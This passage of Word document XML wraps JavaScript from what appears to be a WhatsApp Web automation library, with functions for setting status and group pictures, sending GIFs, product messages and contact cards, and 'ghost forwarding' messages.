          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const { status } = await Store.WapQuery.sendSetPicture(groupId, imgData, imgData);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return status == 200;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Update your status</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">*   @param newStatus string new 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window.WAPI.setMyStatus = function (newStatus) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return Store.MyStatus.setMyStatus(newStatus)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window.WAPI.sendVideoAsGif = async function (imgBase64, chatid, filename, caption, quotedMsg) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let extras = {};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (quotedMsg) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (typeof quotedMsg !== "object") quotedMsg = Store.Msg.get(quotedMsg);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        extras = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            quotedMsg,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            quotedParticipant: quotedMsg.author || quotedMsg.from,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            quotedStanzaID: quotedMsg.id.id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create new chat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await Store.Chat.find(chatid).then(async (chat) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        var mediaBlob = window.WAPI.base64ImageToFile(imgBase64, filename);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        var mc = new Store.MediaCollection(chat);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        return await window.WAPI.procFiles(chat, mediaBlob).then(async mc =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            var media = mc.models[0];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            media.mediaPrep._mediaData.isGif = true;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            media.mediaPrep._mediaData.gifAttribution = 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            await media.mediaPrep.sendToChat(chat, { caption, ...extras });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            return chat.lastReceivedKey._serialized;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window.WAPI.refreshBusinessProfileProducts = async function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await Promise.all(Store.BusinessProfile.models.map(async x =&gt;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await Store.Catalog.findCarouselCatalog(x.id._serialized)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        } catch (error)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Find any product listings of the given number. Use this to query a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id id of buseinss profile (i.e the number with @c.us)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns None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window.WAPI.getBusinessProfilesProducts = async function (id)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if (!Store.Catalog.get(id)) await Store.Catalog.findCarouselCatalog(id)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const catalog = Store.Catalog.get(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (catalog.productCollection &amp;&amp; catalog.productCollection._models.length)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            return JSON.parse(JSON.stringify(catalog.productCollection._models));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        else return [];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    } catch (error)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window.WAPI.procFiles = async function (chat, blobs) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!Array.isArray(blobs)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        blobs = [blobs];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mc = new Store.MediaCollection(chat);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await mc.processFiles((Debug.VERSION === '0.4.613') ? blobs : blobs.map(blob =&gt; { return { file: blob } }), chat, 1);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return mc</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Sends product with image to chat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param imgBase64 Base64 image data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param chatid string the id of the chat that you want to send this product to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param caption string the caption you want to add to this message</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param bizNumber string the @c.us number of the business account from which you want to grab the product</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param productId string the id of the product within the main catalog of the aforementioned business</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns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window.WAPI.sendImageWithProduct = async function (imgBase64, chatid, caption, bizNumber, productId) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await WAPI.refreshBusinessProfileProducts();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await Store.Catalog.findCarouselCatalog(bizNumber).then(async cat =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (cat &amp;&amp; cat[0]) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const product = cat[0].productCollection.get(productId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const temp = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                productMsgOptions: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    businessOwnerJid: product.catalogWid.toString({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        legacy: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productId: product.id.toString(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    url: product.url,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    productImageCount: product.productImageCollection.length,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    title: product.name,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    description: product.description,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    currencyCode: product.currency,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    priceAmount1000: product.priceAmount1000,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    type: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var idUser = new Store.WidFactory.createWid(chatid);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Store.Chat.find(chatid).then(async (chat) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                var mediaBlob = window.WAPI.base64ImageToFile(imgBase64, "filename.jpg");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                // var mc = new Store.MediaCollection(chat);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                // mc.processFiles([mediaBlob], chat, 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                return await window.WAPI.procFiles(chat, mediaBlob).then(async mc =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    var media = mc.models[0];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    Object.entries(temp.productMsgOptions).map(([k, v]) =&gt; media.mediaPrep._mediaData[k] = v)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    await media.mediaPrep.sendToChat(chat, temp);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    return chat.lastReceivedKey._serialized;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window.WAPI.base64ImageToFile = function (b64Data, filename) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var arr = b64Data.split(',');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var mime = arr[0].match(/:(.*?);/)[1];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var bstr = window.Base64 ? window.Base64.atob(arr[1]) : atob(arr[1]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var n = bstr.length;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var u8arr = new Uint8Array(n);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while (n--) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        u8arr[n] = bstr.charCodeAt(n);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 File([u8arr], filename, { type: mime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 contact card to a specific chat using the chat ids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to '000000000000@c.us'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param {string|array} contact '111111111111@c.us' | ['222222222222@c.us', '333333333333@c.us, ... 'nnnnnnnnnnnn@c.us']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window.WAPI.sendContact = function (to, contact) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!Array.isArray(contact)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        contact =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contact = contact.map((c) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        return WAPI.getChat(c).__x_contact;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(contact.length &gt; 1) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        window.WAPI.getChat(to).sendContactList(contact);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    } else if (contact.length === 1) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        window.WAPI.getChat(to).sendContact(contact[0]);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Ghost forwarding is like a normal forward but as if it were sent from the host phone.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window.WAPI.ghostForward = async function (chatId, messageId) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!chatId.includes('@g') &amp;&amp; !chatId.includes('@c')) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var chat = Store.Chat.get(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!Store.Msg.get(messageId)) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var tempMsg = Object.create(Store.Msg.get(messageId));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var newId = window.WAPI.getNewMessageId(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var extend = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ...JSON.parse(JSON.stringify(tempMsg)),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ack: 0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
